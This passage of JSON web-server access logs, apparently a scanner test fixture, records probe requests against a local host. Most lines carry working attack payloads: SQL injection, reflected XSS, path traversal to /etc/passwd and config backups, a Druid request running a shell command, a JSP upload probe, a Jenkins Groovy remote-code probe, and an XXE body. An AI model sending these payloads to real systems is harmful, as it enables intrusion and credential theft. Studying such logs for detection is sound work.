(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms8.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /store/app/etc/local.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms85.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms9.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prtg/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"{\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22User.filter\x22,\x22id\x22: 1,\x22params\x22:{\x22query\x22:{\x22is_active\x22:true}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /json-rpc/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRTG/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.snyk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"{\x0D\x0A\x22type\x22:\x22index\x22,\x0D\x0A\x22spec\x22:{\x0D\x0A \x22ioConfig\x22:{\x0D\x0A \x22type\x22:\x22index\x22,\x0D\x0A \x22firehose\x22:{\x0D\x0A \x22type\x22:\x22local\x22,\x0D\x0A \x22baseDir\x22:\x22/etc\x22,\x0D\x0A \x22filter\x22:\x22passwd\x22\x0D\x0A }\x0D\x0A },\x0D\x0A \x22dataSchema\x22:{\x0D\x0A \x22dataSource\x22:\x22odgjxrrrePz\x22,\x0D\x0A \x22parser\x22:{\x0D\x0A \x22parseSpec\x22:{\x0D\x0A \x22format\x22:\x22javascript\x22,\x0D\x0A \x22timestampSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22dimensionsSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22function\x22:\x22function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\x5C\x22/bin/sh`@~-c`@~cat /etc/passwd\x5C\x22.split(\x5C\x22`@~\x5C\x22)).getInputStream()).useDelimiter(\x5C\x22\x5C\x5CA\x5C\x22).next();return {timestamp:\x5C\x224137368\x5C\x22,OQtGXcxBVQVL: hTVCCerYZ}}\x22,\x0D\x0A \x22\x22:{\x0D\x0A \x22enabled\x22:\x22true\x22\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A},\x0D\x0A\x22samplerConfig\x22:{\x0D\x0A \x22numRows\x22:10\x0D\x0A}\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/297MU54ajlAhxYjbPMpA8qiij5e.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/v1/service-details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php 